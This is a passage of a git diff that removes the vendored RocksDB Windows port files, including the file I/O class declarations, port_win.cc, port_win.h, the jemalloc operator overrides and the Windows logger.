-      result = ::CloseHandle(hFile_);
-      assert(result);
-      hFile_ = NULL;
-    }
-    return result;
-  }
-
-  const std::string& GetName() const { return filename_; }
-
-  HANDLE GetFileHandle() const { return hFile_; }
-
-  bool use_direct_io() const { return use_direct_io_; }
-
-  WinFileData(const WinFileData&) = delete;
-  WinFileData& operator=(const WinFileData&) = delete;
-};
-
-class WinSequentialFile : protected WinFileData, public SequentialFile {
-
-  // Override for behavior change when creating a custom env
-  virtual SSIZE_T PositionedReadInternal(char* src, size_t numBytes,
-    uint64_t offset) const;
-
-public:
-  WinSequentialFile(const std::string& fname, HANDLE f,
-    const EnvOptions& options);
-
-  ~WinSequentialFile();
-
-  WinSequentialFile(const WinSequentialFile&) = delete;
-  WinSequentialFile& operator=(const WinSequentialFile&) = delete;
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override;
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-    char* scratch) override;
-
-  virtual Status Skip(uint64_t n) override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual bool use_direct_io() const override { return WinFileData::use_direct_io(); }
-};
-
-// mmap() based random-access
-class WinMmapReadableFile : private WinFileData, public RandomAccessFile {
-  HANDLE hMap_;
-
-  const void* mapped_region_;
-  const size_t length_;
-
- public:
-  // mapped_region_[0,length-1] contains the mmapped contents of the file.
-  WinMmapReadableFile(const std::string& fileName, HANDLE hFile, HANDLE hMap,
-                      const void* mapped_region, size_t length);
-
-  ~WinMmapReadableFile();
-
-  WinMmapReadableFile(const WinMmapReadableFile&) = delete;
-  WinMmapReadableFile& operator=(const WinMmapReadableFile&) = delete;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-// We preallocate and use memcpy to append new
-// data to the file.  This is safe since we either properly close the
-// file before reading from it, or for log files, the reading code
-// knows enough to skip zero suffixes.
-class WinMmapFile : private WinFileData, public WritableFile {
- private:
-  HANDLE hMap_;
-
-  const size_t page_size_;  // We flush the mapping view in page_size
-  // increments. We may decide if this is a memory
-  // page size or SSD page size
-  const size_t
-      allocation_granularity_;  // View must start at such a granularity
-
-  size_t reserved_size_;  // Preallocated size
-
-  size_t mapping_size_;  // The max size of the mapping object
-  // we want to guess the final file size to minimize the remapping
-  size_t view_size_;  // How much memory to map into a view at a time
-
-  char* mapped_begin_;  // Must begin at the file offset that is aligned with
-  // allocation_granularity_
-  char* mapped_end_;
-  char* dst_;  // Where to write next  (in range [mapped_begin_,mapped_end_])
-  char* last_sync_;  // Where have we synced up to
-
-  uint64_t file_offset_;  // Offset of mapped_begin_ in file
-
-  // Do we have unsynced writes?
-  bool pending_sync_;
-
-  // Can only truncate or reserve to a sector size aligned if
-  // used on files that are opened with Unbuffered I/O
-  Status TruncateFile(uint64_t toSize);
-
-  Status UnmapCurrentRegion();
-
-  Status MapNewRegion();
-
-  virtual Status PreallocateInternal(uint64_t spaceToReserve);
-
- public:
-  WinMmapFile(const std::string& fname, HANDLE hFile, size_t page_size,
-              size_t allocation_granularity, const EnvOptions& options);
-
-  ~WinMmapFile();
-
-  WinMmapFile(const WinMmapFile&) = delete;
-  WinMmapFile& operator=(const WinMmapFile&) = delete;
-
-  virtual Status Append(const Slice& data) override;
-
-  // Means Close() will properly take care of truncate
-  // and it does not need any additional information
-  virtual Status Truncate(uint64_t size) override;
-
-  virtual Status Close() override;
-
-  virtual Status Flush() override;
-
-  // Flush only data
-  virtual Status Sync() override;
-
-  /**
-  * Flush data as well as metadata to stable storage.
-  */
-  virtual Status Fsync() override;
-
-  /**
-  * Get the size of valid data in the file. This will not match the
-  * size that is returned from the filesystem because we use mmap
-  * to extend file by map_size every time.
-  */
-  virtual uint64_t GetFileSize() override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-class WinRandomAccessImpl {
- protected:
-  WinFileData* file_base_;
-  size_t       alignment_;
-
-  // Override for behavior change when creating a custom env
-  virtual SSIZE_T PositionedReadInternal(char* src, size_t numBytes,
-                                         uint64_t offset) const;
-
-  WinRandomAccessImpl(WinFileData* file_base, size_t alignment,
-                      const EnvOptions& options);
-
-  virtual ~WinRandomAccessImpl() {}
-
-  Status ReadImpl(uint64_t offset, size_t n, Slice* result,
-                  char* scratch) const;
-
-  size_t GetAlignment() const { return alignment_; }
-
- public:
-
-  WinRandomAccessImpl(const WinRandomAccessImpl&) = delete;
-  WinRandomAccessImpl& operator=(const WinRandomAccessImpl&) = delete;
-};
-
-// pread() based random-access
-class WinRandomAccessFile
-    : private WinFileData,
-      protected WinRandomAccessImpl,  // Want to be able to override
-                                      // PositionedReadInternal
-      public RandomAccessFile {
- public:
-  WinRandomAccessFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                      const EnvOptions& options);
-
-  ~WinRandomAccessFile();
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-
-  virtual bool use_direct_io() const override { return WinFileData::use_direct_io(); }
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual size_t GetRequiredBufferAlignment() const override;
-};
-
-// This is a sequential write class. It has been mimicked (as others) after
-// the original Posix class. We add support for unbuffered I/O on windows as
-// well
-// we utilize the original buffer as an alignment buffer to write directly to
-// file with no buffering.
-// No buffering requires that the provided buffer is aligned to the physical
-// sector size (SSD page size) and
-// that all SetFilePointer() operations to occur with such an alignment.
-// We thus always write in sector/page size increments to the drive and leave
-// the tail for the next write OR for Close() at which point we pad with zeros.
-// No padding is required for
-// buffered access.
-class WinWritableImpl {
- protected:
-  WinFileData* file_data_;
-  const uint64_t alignment_;
-  uint64_t next_write_offset_; // Needed because Windows does not support O_APPEND
-  uint64_t reservedsize_;  // how far we have reserved space
-
-  virtual Status PreallocateInternal(uint64_t spaceToReserve);
-
-  WinWritableImpl(WinFileData* file_data, size_t alignment);
-
-  ~WinWritableImpl() {}
-
-  uint64_t GetAlignement() const { return alignment_; }
-
-  Status AppendImpl(const Slice& data);
-
-  // Requires that the data is aligned as specified by
-  // GetRequiredBufferAlignment()
-  Status PositionedAppendImpl(const Slice& data, uint64_t offset);
-
-  Status TruncateImpl(uint64_t size);
-
-  Status CloseImpl();
-
-  Status SyncImpl();
-
-  uint64_t GetFileNextWriteOffset() {
-    // Double accounting now here with WritableFileWriter
-    // and this size will be wrong when unbuffered access is used
-    // but tests implement their own writable files and do not use
-    // WritableFileWrapper
-    // so we need to squeeze a square peg through
-    // a round hole here.
-    return next_write_offset_;
-  }
-
-  Status AllocateImpl(uint64_t offset, uint64_t len);
-
- public:
-  WinWritableImpl(const WinWritableImpl&) = delete;
-  WinWritableImpl& operator=(const WinWritableImpl&) = delete;
-};
-
-class WinWritableFile : private WinFileData,
-                        protected WinWritableImpl,
-                        public WritableFile {
- public:
-  WinWritableFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                  size_t capacity, const EnvOptions& options);
-
-  ~WinWritableFile();
-
-  virtual Status Append(const Slice& data) override;
-
-  // Requires that the data is aligned as specified by
-  // GetRequiredBufferAlignment()
-  virtual Status PositionedAppend(const Slice& data, uint64_t offset) override;
-
-  // Need to implement this so the file is truncated correctly
-  // when buffered and unbuffered mode
-  virtual Status Truncate(uint64_t size) override;
-
-  virtual Status Close() override;
-
-  // write out the cached data to the OS cache
-  // This is now taken care of the WritableFileWriter
-  virtual Status Flush() override;
-
-  virtual Status Sync() override;
-
-  virtual Status Fsync() override;
-
-  // Indicates if the class makes use of direct I/O
-  // Use PositionedAppend
-  virtual bool use_direct_io() const override;
-
-  virtual size_t GetRequiredBufferAlignment() const override;
-
-  virtual uint64_t GetFileSize() override;
-
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-class WinRandomRWFile : private WinFileData,
-                        protected WinRandomAccessImpl,
-                        protected WinWritableImpl,
-                        public RandomRWFile {
- public:
-  WinRandomRWFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                  const EnvOptions& options);
-
-  ~WinRandomRWFile() {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const override;
-
-  // Use the returned alignment value to allocate aligned
-  // buffer for Write() when use_direct_io() returns true
-  virtual size_t GetRequiredBufferAlignment() const override;
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) override;
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Flush() override;
-
-  virtual Status Sync() override;
-
-  virtual Status Fsync() { return Sync(); }
-
-  virtual Status Close() override;
-};
-
-class WinDirectory : public Directory {
- public:
-  WinDirectory() {}
-
-  virtual Status Fsync() override;
-};
-
-class WinFileLock : public FileLock {
- public:
-  explicit WinFileLock(HANDLE hFile) : hFile_(hFile) {
-    assert(hFile != NULL);
-    assert(hFile != INVALID_HANDLE_VALUE);
-  }
-
-  ~WinFileLock();
-
- private:
-  HANDLE hFile_;
-};
-}
-}
diff --git a/thirdparty/rocksdb/port/win/port_win.cc b/thirdparty/rocksdb/port/win/port_win.cc
deleted file mode 100644
index b3fccbd..0000000
--- a/thirdparty/rocksdb/port/win/port_win.cc
+++ /dev/null
@@ -1,230 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#if !defined(OS_WIN) && !defined(WIN32) && !defined(_WIN32)
-#error Windows Specific Code
-#endif
-
-#include "port/win/port_win.h"
-
-#include <io.h>
-#include "port/dirent.h"
-#include "port/sys_time.h"
-
-#include <cstdlib>
-#include <stdio.h>
-#include <assert.h>
-#include <string.h>
-
-#include <memory>
-#include <exception>
-#include <chrono>
-
-#include "util/logging.h"
-
-namespace rocksdb {
-namespace port {
-
-void gettimeofday(struct timeval* tv, struct timezone* /* tz */) {
-  using namespace std::chrono;
-
-  microseconds usNow(
-      duration_cast<microseconds>(system_clock::now().time_since_epoch()));
-
-  seconds secNow(duration_cast<seconds>(usNow));
-
-  tv->tv_sec = static_cast<long>(secNow.count());
-  tv->tv_usec = static_cast<long>(usNow.count() -
-      duration_cast<microseconds>(secNow).count());
-}
-
-Mutex::~Mutex() {}
-
-CondVar::~CondVar() {}
-
-void CondVar::Wait() {
-  // Caller must ensure that mutex is held prior to calling this method
-  std::unique_lock<std::mutex> lk(mu_->getLock(), std::adopt_lock);
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  cv_.wait(lk);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  // Release ownership of the lock as we don't want it to be unlocked when
-  // it goes out of scope (as we adopted the lock and didn't lock it ourselves)
-  lk.release();
-}
-
-bool CondVar::TimedWait(uint64_t abs_time_us) {
-
-  using namespace std::chrono;
-
-  // MSVC++ library implements wait_until in terms of wait_for so
-  // we need to convert absolute wait into relative wait.
-  microseconds usAbsTime(abs_time_us);
-
-  microseconds usNow(
-    duration_cast<microseconds>(system_clock::now().time_since_epoch()));
-  microseconds relTimeUs =
-    (usAbsTime > usNow) ? (usAbsTime - usNow) : microseconds::zero();
-
-  // Caller must ensure that mutex is held prior to calling this method
-  std::unique_lock<std::mutex> lk(mu_->getLock(), std::adopt_lock);
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  std::cv_status cvStatus = cv_.wait_for(lk, relTimeUs);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  // Release ownership of the lock as we don't want it to be unlocked when
-  // it goes out of scope (as we adopted the lock and didn't lock it ourselves)
-  lk.release();
-
-  if (cvStatus == std::cv_status::timeout) {
-    return true;
-  }
-
-  return false;
-}
-
-void CondVar::Signal() { cv_.notify_one(); }
-
-void CondVar::SignalAll() { cv_.notify_all(); }
-
-int PhysicalCoreID() { return GetCurrentProcessorNumber(); }
-
-void InitOnce(OnceType* once, void (*initializer)()) {
-  std::call_once(once->flag_, initializer);
-}
-
-// Private structure, exposed only by pointer
-struct DIR {
-  intptr_t handle_;
-  bool firstread_;
-  struct __finddata64_t data_;
-  dirent entry_;
-
-  DIR() : handle_(-1), firstread_(true) {}
-
-  DIR(const DIR&) = delete;
-  DIR& operator=(const DIR&) = delete;
-
-  ~DIR() {
-    if (-1 != handle_) {
-      _findclose(handle_);
-    }
-  }
-};
-
-DIR* opendir(const char* name) {
-  if (!name || *name == 0) {
-    errno = ENOENT;
-    return nullptr;
-  }
-
-  std::string pattern(name);
-  pattern.append("\\").append("*");
-
-  std::unique_ptr<DIR> dir(new DIR);
-
-  dir->handle_ = _findfirst64(pattern.c_str(), &dir->data_);
-
-  if (dir->handle_ == -1) {
-    return nullptr;
-  }
-
-  strcpy_s(dir->entry_.d_name, sizeof(dir->entry_.d_name), dir->data_.name);
-
-  return dir.release();
-}
-
-struct dirent* readdir(DIR* dirp) {
-  if (!dirp || dirp->handle_ == -1) {
-    errno = EBADF;
-    return nullptr;
-  }
-
-  if (dirp->firstread_) {
-    dirp->firstread_ = false;
-    return &dirp->entry_;
-  }
-
-  auto ret = _findnext64(dirp->handle_, &dirp->data_);
-
-  if (ret != 0) {
-    return nullptr;
-  }
-
-  strcpy_s(dirp->entry_.d_name, sizeof(dirp->entry_.d_name), dirp->data_.name);
-
-  return &dirp->entry_;
-}
-
-int closedir(DIR* dirp) {
-  delete dirp;
-  return 0;
-}
-
-int truncate(const char* path, int64_t len) {
-  if (path == nullptr) {
-    errno = EFAULT;
-    return -1;
-  }
-
-  if (len < 0) {
-    errno = EINVAL;
-    return -1;
-  }
-
-  HANDLE hFile =
-      CreateFile(path, GENERIC_READ | GENERIC_WRITE,
-                 FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
-                 NULL,           // Security attrs
-                 OPEN_EXISTING,  // Truncate existing file only
-                 FILE_ATTRIBUTE_NORMAL, NULL);
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    if (lastError == ERROR_FILE_NOT_FOUND) {
-      errno = ENOENT;
-    } else if (lastError == ERROR_ACCESS_DENIED) {
-      errno = EACCES;
-    } else {
-      errno = EIO;
-    }
-    return -1;
-  }
-
-  int result = 0;
-  FILE_END_OF_FILE_INFO end_of_file;
-  end_of_file.EndOfFile.QuadPart = len;
-
-  if (!SetFileInformationByHandle(hFile, FileEndOfFileInfo, &end_of_file,
-                                  sizeof(FILE_END_OF_FILE_INFO))) {
-    errno = EIO;
-    result = -1;
-  }
-
-  CloseHandle(hFile);
-  return result;
-}
-
-void Crash(const std::string& srcfile, int srcline) {
-  fprintf(stdout, "Crashing at %s:%d\n", srcfile.c_str(), srcline);
-  fflush(stdout);
-  abort();
-}
-
-int GetMaxOpenFiles() { return -1; }
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/port_win.h b/thirdparty/rocksdb/port/win/port_win.h
deleted file mode 100644
index f3c8669..0000000
--- a/thirdparty/rocksdb/port/win/port_win.h
+++ /dev/null
@@ -1,347 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#ifndef STORAGE_LEVELDB_PORT_PORT_WIN_H_
-#define STORAGE_LEVELDB_PORT_PORT_WIN_H_
-
-// Always want minimum headers
-#ifndef WIN32_LEAN_AND_MEAN
-#define WIN32_LEAN_AND_MEAN
-#endif
-
-// Assume that for everywhere
-#undef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN true
-
-#include <windows.h>
-#include <string>
-#include <string.h>
-#include <mutex>
-#include <limits>
-#include <condition_variable>
-#include <malloc.h>
-
-#include <stdint.h>
-
-#include "port/win/win_thread.h"
-
-#include "rocksdb/options.h"
-
-#undef min
-#undef max
-#undef DeleteFile
-#undef GetCurrentTime
-
-
-#ifndef strcasecmp
-#define strcasecmp _stricmp
-#endif
-
-#undef GetCurrentTime
-#undef DeleteFile
-
-#ifndef _SSIZE_T_DEFINED
-typedef SSIZE_T ssize_t;
-#endif
-
-// size_t printf formatting named in the manner of C99 standard formatting
-// strings such as PRIu64
-// in fact, we could use that one
-#ifndef ROCKSDB_PRIszt
-#define ROCKSDB_PRIszt "Iu"
-#endif
-
-#ifdef _MSC_VER
-#define __attribute__(A)
-
-// Thread local storage on Linux
-// There is thread_local in C++11
-#ifndef __thread
-#define __thread __declspec(thread)
-#endif
-
-#endif
-
-#ifndef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN (__BYTE_ORDER == __LITTLE_ENDIAN)
-#endif
-
-namespace rocksdb {
-
-#define PREFETCH(addr, rw, locality)
-
-namespace port {
-
-// VS 15
-#if (defined _MSC_VER) && (_MSC_VER >= 1900)
-
-#define ROCKSDB_NOEXCEPT noexcept
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = std::numeric_limits<int>::max();
-const uint64_t kMaxUint64 = std::numeric_limits<uint64_t>::max();
-const int64_t kMaxInt64 = std::numeric_limits<int64_t>::max();
-
-const size_t kMaxSizet = std::numeric_limits<size_t>::max();
-
-#else //_MSC_VER
-
-// VS 15 has snprintf
-#define snprintf _snprintf
-
-#define ROCKSDB_NOEXCEPT
-// std::numeric_limits<size_t>::max() is not constexpr just yet
-// therefore, use the same limits
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = INT32_MAX;
-const int64_t kMaxInt64 = INT64_MAX;
-const uint64_t kMaxUint64 = UINT64_MAX;
-
-#ifdef _WIN64
-const size_t kMaxSizet = UINT64_MAX;
-#else
-const size_t kMaxSizet = UINT_MAX;
-#endif
-
-#endif //_MSC_VER
-
-const bool kLittleEndian = true;
-
-class CondVar;
-
-class Mutex {
- public:
-
-   /* implicit */ Mutex(bool adaptive = false)
-#ifndef NDEBUG
-     : locked_(false)
-#endif
-   { }
-
-  ~Mutex();
-
-  void Lock() {
-    mutex_.lock();
-#ifndef NDEBUG
-    locked_ = true;
-#endif
-  }
-
-  void Unlock() {
-#ifndef NDEBUG
-    locked_ = false;
-#endif
-    mutex_.unlock();
-  }
-
-  // this will assert if the mutex is not locked
-  // it does NOT verify that mutex is held by a calling thread
-  void AssertHeld() {
-#ifndef NDEBUG
-    assert(locked_);
-#endif
-  }
-
-  // Mutex is move only with lock ownership transfer
-  Mutex(const Mutex&) = delete;
-  void operator=(const Mutex&) = delete;
-
- private:
-
-  friend class CondVar;
-
-  std::mutex& getLock() {
-    return mutex_;
-  }
-
-  std::mutex mutex_;
-#ifndef NDEBUG
-  bool locked_;
-#endif
-};
-
-class RWMutex {
- public:
-  RWMutex() { InitializeSRWLock(&srwLock_); }
-
-  void ReadLock() { AcquireSRWLockShared(&srwLock_); }
-
-  void WriteLock() { AcquireSRWLockExclusive(&srwLock_); }
-
-  void ReadUnlock() { ReleaseSRWLockShared(&srwLock_); }
-
-  void WriteUnlock() { ReleaseSRWLockExclusive(&srwLock_); }
-
-  // Empty as in POSIX
-  void AssertHeld() {}
-
- private:
-  SRWLOCK srwLock_;
-  // No copying allowed
-  RWMutex(const RWMutex&);
-  void operator=(const RWMutex&);
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu) : mu_(mu) {
-  }
-
-  ~CondVar();
-  void Wait();
-  bool TimedWait(uint64_t expiration_time);
-  void Signal();
-  void SignalAll();
-
-  // Condition var is not copy/move constructible
-  CondVar(const CondVar&) = delete;
-  CondVar& operator=(const CondVar&) = delete;
-
-  CondVar(CondVar&&) = delete;
-  CondVar& operator=(CondVar&&) = delete;
-
- private:
-  std::condition_variable cv_;
-  Mutex* mu_;
-};
-
-// Wrapper around the platform efficient
-// or otherwise preferrable implementation
-using Thread = WindowsThread;
-
-// OnceInit type helps emulate
-// Posix semantics with initialization
-// adopted in the project
-struct OnceType {
-
-    struct Init {};
-
-    OnceType() {}
-    OnceType(const Init&) {}
-    OnceType(const OnceType&) = delete;
-    OnceType& operator=(const OnceType&) = delete;
-
-    std::once_flag flag_;
-};
-
-#define LEVELDB_ONCE_INIT port::OnceType::Init()
-extern void InitOnce(OnceType* once, void (*initializer)());
-
-#ifndef CACHE_LINE_SIZE
-#define CACHE_LINE_SIZE 64U
-#endif
-
-#ifdef ROCKSDB_JEMALLOC
-#include "jemalloc/jemalloc.h"
-// Separate inlines so they can be replaced if needed
-inline void* jemalloc_aligned_alloc( size_t size, size_t alignment) {
-  return je_aligned_alloc(alignment, size);
-}
-inline void jemalloc_aligned_free(void* p) {
-  je_free(p);
-}
-#endif
-
-inline void *cacheline_aligned_alloc(size_t size) {
-#ifdef ROCKSDB_JEMALLOC
-  return jemalloc_aligned_alloc(size, CACHE_LINE_SIZE);
-#else
-  return _aligned_malloc(size, CACHE_LINE_SIZE);
-#endif
-}
-
-inline void cacheline_aligned_free(void *memblock) {
-#ifdef ROCKSDB_JEMALLOC
-  jemalloc_aligned_free(memblock);
-#else
-  _aligned_free(memblock);
-#endif
-}
-
-// https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32
-// could not be worked around with by -mno-ms-bitfields
-#ifndef __MINGW32__
-#define ALIGN_AS(n) __declspec(align(n))
-#else
-#define ALIGN_AS(n)
-#endif
-
-static inline void AsmVolatilePause() {
-#if defined(_M_IX86) || defined(_M_X64)
-  YieldProcessor();
-#endif
-  // it would be nice to get "wfe" on ARM here
-}
-
-extern int PhysicalCoreID();
-
-// For Thread Local Storage abstraction
-typedef DWORD pthread_key_t;
-
-inline int pthread_key_create(pthread_key_t* key, void (*destructor)(void*)) {
-  // Not used
-  (void)destructor;
-
-  pthread_key_t k = TlsAlloc();
-  if (TLS_OUT_OF_INDEXES == k) {
-    return ENOMEM;
-  }
-
-  *key = k;
-  return 0;
-}
-
-inline int pthread_key_delete(pthread_key_t key) {
-  if (!TlsFree(key)) {
-    return EINVAL;
-  }
-  return 0;
-}
-
-inline int pthread_setspecific(pthread_key_t key, const void* value) {
-  if (!TlsSetValue(key, const_cast<void*>(value))) {
-    return ENOMEM;
-  }
-  return 0;
-}
-
-inline void* pthread_getspecific(pthread_key_t key) {
-  void* result = TlsGetValue(key);
-  if (!result) {
-    if (GetLastError() != ERROR_SUCCESS) {
-      errno = EINVAL;
-    } else {
-      errno = NOERROR;
-    }
-  }
-  return result;
-}
-
-// UNIX equiv although errno numbers will be off
-// using C-runtime to implement. Note, this does not
-// feel space with zeros in case the file is extended.
-int truncate(const char* path, int64_t length);
-void Crash(const std::string& srcfile, int srcline);
-extern int GetMaxOpenFiles();
-
-}  // namespace port
-
-using port::pthread_key_t;
-using port::pthread_key_create;
-using port::pthread_key_delete;
-using port::pthread_setspecific;
-using port::pthread_getspecific;
-using port::truncate;
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_LEVELDB_PORT_PORT_WIN_H_
diff --git a/thirdparty/rocksdb/port/win/win_jemalloc.cc b/thirdparty/rocksdb/port/win/win_jemalloc.cc
deleted file mode 100644
index fc46e18..0000000
--- a/thirdparty/rocksdb/port/win/win_jemalloc.cc
+++ /dev/null
@@ -1,47 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under the BSD-style license found in the
-//  LICENSE file in the root directory of this source tree. An additional grant
-//  of patent rights can be found in the PATENTS file in the same directory.
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_JEMALLOC
-# error This file can only be part of jemalloc aware build
-#endif
-
-#include <stdexcept>
-#include "jemalloc/jemalloc.h"
-
-// Global operators to be replaced by a linker when this file is
-// a part of the build
-
-void* operator new(size_t size) {
-  void* p = je_malloc(size);
-  if (!p) {
-    throw std::bad_alloc();
-  }
-  return p;
-}
-
-void* operator new[](size_t size) {
-  void* p = je_malloc(size);
-  if (!p) {
-    throw std::bad_alloc();
-  }
-  return p;
-}
-
-void operator delete(void* p) {
-  if (p) {
-    je_free(p);
-  }
-}
-
-void operator delete[](void* p) {
-  if (p) {
-    je_free(p);
-  }
-}
-
diff --git a/thirdparty/rocksdb/port/win/win_logger.cc b/thirdparty/rocksdb/port/win/win_logger.cc
deleted file mode 100644
index 0bace9f..0000000
--- a/thirdparty/rocksdb/port/win/win_logger.cc
+++ /dev/null
@@ -1,160 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#include "port/win/win_logger.h"
-#include "port/win/io_win.h"
-
-#include <algorithm>
-#include <stdio.h>
-#include <time.h>
-#include <fcntl.h>
-#include <atomic>
-
-#include "rocksdb/env.h"
-
-#include "monitoring/iostats_context_imp.h"
-#include "port/sys_time.h"
-
-namespace rocksdb {
-
-namespace port {
-
-WinLogger::WinLogger(uint64_t (*gettid)(), Env* env, HANDLE file,
-                     const InfoLogLevel log_level)
-    : Logger(log_level),
-      file_(file),
-      gettid_(gettid),
-      log_size_(0),
-      last_flush_micros_(0),
-      env_(env),
-      flush_pending_(false) {}
-
-void WinLogger::DebugWriter(const char* str, int len) {
-  DWORD bytesWritten = 0;
-  BOOL ret = WriteFile(file_, str, len, &bytesWritten, NULL);
-  if (ret == FALSE) {
-    std::string errSz = GetWindowsErrSz(GetLastError());
-    fprintf(stderr, errSz.c_str());
-  }
-}
-
-WinLogger::~WinLogger() { close(); }
-
-void WinLogger::close() { CloseHandle(file_); }
-
-void WinLogger::Flush() {
-  if (flush_pending_) {
-    flush_pending_ = false;
-    // With Windows API writes go to OS buffers directly so no fflush needed
-    // unlike with C runtime API. We don't flush all the way to disk
-    // for perf reasons.
-  }
-
-  last_flush_micros_ = env_->NowMicros();
-}
-
-void WinLogger::Logv(const char* format, va_list ap) {
-  IOSTATS_TIMER_GUARD(logger_nanos);
-
-  const uint64_t thread_id = (*gettid_)();
-
-  // We try twice: the first time with a fixed-size stack allocated buffer,
-  // and the second time with a much larger dynamically allocated buffer.
-  char buffer[500];
-  std::unique_ptr<char[]> largeBuffer;
-  for (int iter = 0; iter < 2; ++iter) {
-    char* base;
-    int bufsize;
-    if (iter == 0) {
-      bufsize = sizeof(buffer);
-      base = buffer;
-    } else {
-      bufsize = 30000;
-      largeBuffer.reset(new char[bufsize]);
-      base = largeBuffer.get();
-    }
-
-    char* p = base;
-    char* limit = base + bufsize;
-
-    struct timeval now_tv;
-    gettimeofday(&now_tv, nullptr);
-    const time_t seconds = now_tv.tv_sec;
-    struct tm t;
-    localtime_s(&t, &seconds);
-    p += snprintf(p, limit - p, "%04d/%02d/%02d-%02d:%02d:%02d.%06d %llx ",
-                  t.tm_year + 1900, t.tm_mon + 1, t.tm_mday, t.tm_hour,
-                  t.tm_min, t.tm_sec, static_cast<int>(now_tv.tv_usec),
-                  static_cast<long long unsigned int>(thread_id));
-
-    // Print the message
-    if (p < limit) {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int done = vsnprintf(p, limit - p, format, backup_ap);
-      if (done > 0) {
-        p += done;
-      } else {
-        continue;
-      }
-      va_end(backup_ap);
-    }
-
-    // Truncate to available space if necessary
-    if (p >= limit) {
-      if (iter == 0) {
-        continue;  // Try again with larger buffer
-      } else {
-        p = limit - 1;
-      }
-    }
-
-    // Add newline if necessary
-    if (p == base || p[-1] != '\n') {
-      *p++ = '\n';
-    }
-
-    assert(p <= limit);
-    const size_t write_size = p - base;
-
-    DWORD bytesWritten = 0;
-    BOOL ret = WriteFile(file_, base, static_cast<DWORD>(write_size),
-      &bytesWritten, NULL);
-    if (ret == FALSE) {
-      std::string errSz = GetWindowsErrSz(GetLastError());
-      fprintf(stderr, errSz.c_str());
-    }
-
-    flush_pending_ = true;
-    assert((bytesWritten == write_size) || (ret == FALSE));
-    if (bytesWritten > 0) {
-      log_size_ += write_size;
-    }
-
-    uint64_t now_micros =
-        static_cast<uint64_t>(now_tv.tv_sec) * 1000000 + now_tv.tv_usec;
-    if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-      flush_pending_ = false;
-      // With Windows API writes go to OS buffers directly so no fflush needed
-      // unlike with C runtime API. We don't flush all the way to disk
-      // for perf reasons.
-      last_flush_micros_ = now_micros;
-    }
-    break;
-  }
-}
-
